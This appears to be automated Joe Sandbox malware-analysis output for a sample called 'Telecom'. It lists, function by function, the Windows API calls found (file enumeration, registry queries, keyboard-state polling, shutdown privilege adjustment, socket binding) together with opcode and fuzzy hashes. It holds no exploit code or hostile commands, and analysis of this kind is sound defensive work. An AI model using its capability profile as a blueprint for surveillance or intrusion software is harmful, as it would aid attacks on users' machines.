                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: b5d16dc7bf9544340d58bd2cf42bdf0acb89d55828a5e463148106fe3f74a9b4
                                                      • Instruction ID: e79f8ee9d8138923bfc9cda06a8ea7be5a28ae7dde6bc623c55a4202e6ad0336
                                                      • Opcode Fuzzy Hash: b5d16dc7bf9544340d58bd2cf42bdf0acb89d55828a5e463148106fe3f74a9b4
                                                      • Instruction Fuzzy Hash: C761C535105201AFD310EF20DC85F6A77A4EF44708F14456FF84A872A2DB35E94ACBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004B7403
                                                      • FindClose.KERNEL32(00000000), ref: 004B7457
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B7493
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B74BA
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004B74F7
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004B7524
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: 30ba42280eed0e14f78c1e5a2627dfc2ee20f92e090441b35b4d4a190d81963b
                                                      • Instruction ID: 9f267337aa9c08e68988a2887853dd0484f794704e06196e5a953af54c626048
                                                      • Opcode Fuzzy Hash: 30ba42280eed0e14f78c1e5a2627dfc2ee20f92e090441b35b4d4a190d81963b
                                                      • Instruction Fuzzy Hash: 60D153B1508344AFD310EB65C881EAFB7ECEF98708F44091EF585D6292EB78D948C766
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004BA0A8
                                                      • GetFileAttributesW.KERNEL32(?), ref: 004BA0E6
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 004BA100
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004BA118
                                                      • FindClose.KERNEL32(00000000), ref: 004BA123
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 004BA13F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004BA18F
                                                      • SetCurrentDirectoryW.KERNEL32(00507B94), ref: 004BA1AD
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BA1B7
                                                      • FindClose.KERNEL32(00000000), ref: 004BA1C4
                                                      • FindClose.KERNEL32(00000000), ref: 004BA1D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: e532070ef2b88f5a924d48b846f3f279f56e9f8cde4c639d41430b3386ed3a6f
                                                      • Instruction ID: b1dfc3ae103c6b3baf20a17786e807cb1f785a5caf775c139ee35680b04b2e29
                                                      • Opcode Fuzzy Hash: e532070ef2b88f5a924d48b846f3f279f56e9f8cde4c639d41430b3386ed3a6f
                                                      • Instruction Fuzzy Hash: 6D31C631A0121D7BDB14AFB9DC49ADF77ACAF05320F1001A7E815D2190EB78DE558A7D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004B4785
                                                      • _wcslen.LIBCMT ref: 004B47B2
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004B47E2
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004B4803
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 004B4813
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004B489A
                                                      • CloseHandle.KERNEL32(00000000), ref: 004B48A5
                                                      • CloseHandle.KERNEL32(00000000), ref: 004B48B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 1149970189-3457252023
                                                      • Opcode ID: 7072c4c922cdb865804184a16946db2eb5463625f175187f0912346dfd4f8928
                                                      • Instruction ID: c38d671e073255b4bcdbe1e9938226597d2adfc1e0e78464e038371b1709316a
                                                      • Opcode Fuzzy Hash: 7072c4c922cdb865804184a16946db2eb5463625f175187f0912346dfd4f8928
                                                      • Instruction Fuzzy Hash: D9318E75900249AADB219BA0DC49FEB37BCEF89704F1040B7F50992161EB7896548B29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$,^P$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$}$^P
                                                      • API String ID: 0-3532964994
                                                      • Opcode ID: 2d55cd2c19d795fc2a53c98f562407203c6876ea795d8f9c9f6458d82c3450c4
                                                      • Instruction ID: ff3acc12506ddb2707b14b96e017244c40000bac8874303868b9a875a4f5b0b2
                                                      • Opcode Fuzzy Hash: 2d55cd2c19d795fc2a53c98f562407203c6876ea795d8f9c9f6458d82c3450c4
                                                      • Instruction Fuzzy Hash: E493A235E002159FCF24CF58D9916AEBBB1FF48310F24816BD945AB381E7789D82CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004BA203
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004BA25E
                                                      • FindClose.KERNEL32(00000000), ref: 004BA269
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 004BA285
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004BA2D5
                                                      • SetCurrentDirectoryW.KERNEL32(00507B94), ref: 004BA2F3
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BA2FD
                                                      • FindClose.KERNEL32(00000000), ref: 004BA30A
                                                      • FindClose.KERNEL32(00000000), ref: 004BA31A
                                                        • Part of subcall function 004AE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004AE3B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 04364cf57a4030a18b16f7c36ff361c528dc652992a1a7b4feeae67b1dd95ae8
                                                      • Instruction ID: de3cfda81398e72048979bfbed274d11218dbd1d3ac463cc1207ff1866deb715
                                                      • Opcode Fuzzy Hash: 04364cf57a4030a18b16f7c36ff361c528dc652992a1a7b4feeae67b1dd95ae8
                                                      • Instruction Fuzzy Hash: CF31143190120D6ACF24AFB5DC09ADF77ACAF45324F1001A7E810E3290EB39DE95CA2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC99E
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 004CCA09
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CCA2D
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004CCA8C
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004CCB47
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCBB4
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCC49
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 004CCC9A
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 004CCD43
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004CCDE2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CCDEF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 3102970594-0
                                                      • Opcode ID: 45345161e4912571a360d381ef9ef8a5b6d42cd22449e203528aeb8812abaf80
                                                      • Instruction ID: 7b2642e355036597507ab483a5ec822a39f078ca608f0b86bcef390bc8853ac4
                                                      • Opcode Fuzzy Hash: 45345161e4912571a360d381ef9ef8a5b6d42cd22449e203528aeb8812abaf80
                                                      • Instruction Fuzzy Hash: E2024D756042009FD754DF24C895F2ABBE5EF89308F1884AEE84ACB362D735EC42CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 004AA65D
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 004AA6DE
                                                      • GetKeyState.USER32(000000A0), ref: 004AA6F9
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004AA713
                                                      • GetKeyState.USER32(000000A1), ref: 004AA728
                                                      • GetAsyncKeyState.USER32(00000011), ref: 004AA740
                                                      • GetKeyState.USER32(00000011), ref: 004AA752
                                                      • GetAsyncKeyState.USER32(00000012), ref: 004AA76A
                                                      • GetKeyState.USER32(00000012), ref: 004AA77C
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 004AA794
                                                      • GetKeyState.USER32(0000005B), ref: 004AA7A6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: cb8cd10a3b6a5f8aa751ae29294be73ecd866ce9b9046eb92ca91d013b289534
                                                      • Instruction ID: 599303cef043d43d8f96212ec5280cd05ed89d6e63bc68d56c12a788762a6d70
                                                      • Opcode Fuzzy Hash: cb8cd10a3b6a5f8aa751ae29294be73ecd866ce9b9046eb92ca91d013b289534
                                                      • Instruction Fuzzy Hash: 5F41A4685447C969FF31966084143A7BFB06B33344F48805BD5C64A3C2EB9CD9E8CBAB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004A205A
                                                        • Part of subcall function 004A2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004A2087
                                                        • Part of subcall function 004A2010: GetLastError.KERNEL32 ref: 004A2097
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 004AF249
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: 975f045803d822a57ca621480a1368f5c2855f98539bfa408aa89e36c421d446
                                                      • Instruction ID: b69b0bedc0c571add7de5ac67e13117b6db1cb4d873fd6a4a6cd72634c391841
                                                      • Opcode Fuzzy Hash: 975f045803d822a57ca621480a1368f5c2855f98539bfa408aa89e36c421d446
                                                      • Instruction Fuzzy Hash: 2401497BA112106BEB2426F89C8AFBF736C9F2A344F100973FD03E21D1D5695C099198
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DefDlgProcW.USER32(?,?), ref: 0044233E
                                                      • GetSysColor.USER32(0000000F), ref: 00442421
                                                      • SetBkColor.GDI32(?,00000000), ref: 00442434
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Color$Proc
                                                      • String ID: (Q
                                                      • API String ID: 929743424-2768264020
                                                      • Opcode ID: 9221f7be56ef9e5bb89113ae647158ee7b569c22d641ec23507a9551b4468da1
                                                      • Instruction ID: a92c9b1a2a87c77cc54b82356754b080b7d77d617bca0132f1b894ce84dc8627
                                                      • Opcode Fuzzy Hash: 9221f7be56ef9e5bb89113ae647158ee7b569c22d641ec23507a9551b4468da1
                                                      • Instruction Fuzzy Hash: E58126B0114400BAF2287E398EA9E7F25AEEB42709F51451BF902C6791C9DDCE42937F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: d56c0cbb25d0a6a5af1611df4f851be522d728f88b45fdda6b3ff547098c0555
                                                      • Instruction ID: d6bce144bf12fe9acf7432718246c9efe43ae2a6b22ffe81ec4445dcdaa69b20
                                                      • Opcode Fuzzy Hash: d56c0cbb25d0a6a5af1611df4f851be522d728f88b45fdda6b3ff547098c0555
                                                      • Instruction Fuzzy Hash: BEC24C71E046288FDB25CE28DD407EAB7B5EB48305F1582EBD84DE7240E778AE858F45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004A1916
                                                        • Part of subcall function 004A1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004A1922
                                                        • Part of subcall function 004A1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004A1931
                                                        • Part of subcall function 004A1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004A1938
                                                        • Part of subcall function 004A1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004A194E
                                                      • GetLengthSid.ADVAPI32(?,00000000,004A1C81), ref: 004A20FB
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004A2107
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004A210E
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 004A2127
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,004A1C81), ref: 004A213B
                                                      • HeapFree.KERNEL32(00000000), ref: 004A2142
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: f00f588e809106516986af7d8489751699c5ffd579efc9ce99f21e9896f24ac4
                                                      • Instruction ID: 3984d00ef71e7209e2c5ce61ce92ba1ed15504216753799a3b435513c7dfd376
                                                      • Opcode Fuzzy Hash: f00f588e809106516986af7d8489751699c5ffd579efc9ce99f21e9896f24ac4
                                                      • Instruction Fuzzy Hash: 0B110371901204FFDB108F68CD08BEF7BB9EF52355F10802AE98193220C3799900DB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004BA5BD
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004BA6D0
                                                        • Part of subcall function 004B42B9: GetInputState.USER32 ref: 004B4310
                                                        • Part of subcall function 004B42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B43AB
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004BA5ED
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004BA6BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 88e401056d6ac548327585d5af0537aad76bd6e82eab38a547fd8cbda813d947
                                                      • Instruction ID: e7a0c862e25ce92cd9d6571b006c0ab1eedf1936fa5c8961b30e0e9b9a51e885
                                                      • Opcode Fuzzy Hash: 88e401056d6ac548327585d5af0537aad76bd6e82eab38a547fd8cbda813d947
                                                      • Instruction Fuzzy Hash: DB4172B1D0020AAFDF14DF65CC49AEEBBB4EF05314F24405BE845A2291EB349E54CF6A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004C3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004C3AD7
                                                        • Part of subcall function 004C3AAB: _wcslen.LIBCMT ref: 004C3AF8
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004C22BA
                                                      • WSAGetLastError.WSOCK32 ref: 004C22E1
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 004C2338
                                                      • WSAGetLastError.WSOCK32 ref: 004C2343
                                                      • closesocket.WSOCK32(00000000), ref: 004C2372
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: 416342c1ee28fd8dbc4dc9c8dc866e9484f4661514659d23bc5e15f343f1d7da
                                                      • Instruction ID: ba5d8d9316c659e7d1bd85e17fbab76929f9fd7b345c56cfb023dcd68d607035
                                                      • Opcode Fuzzy Hash: 416342c1ee28fd8dbc4dc9c8dc866e9484f4661514659d23bc5e15f343f1d7da
                                                      • Instruction Fuzzy Hash: 86510574A00200AFE711AF25C986F2A77E4AB04718F04809EF9059F3D3C7B9AC428BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 499a690f476b630301137116fd8628b23349a8a991a5f8f78f03ba8ca72fac30
                                                      • Instruction ID: fd903950d4cc0855d35657e5aa18c20edb20f5c7ec82b1d2bbbb4e0572b77641
                                                      • Opcode Fuzzy Hash: 499a690f476b630301137116fd8628b23349a8a991a5f8f78f03ba8ca72fac30
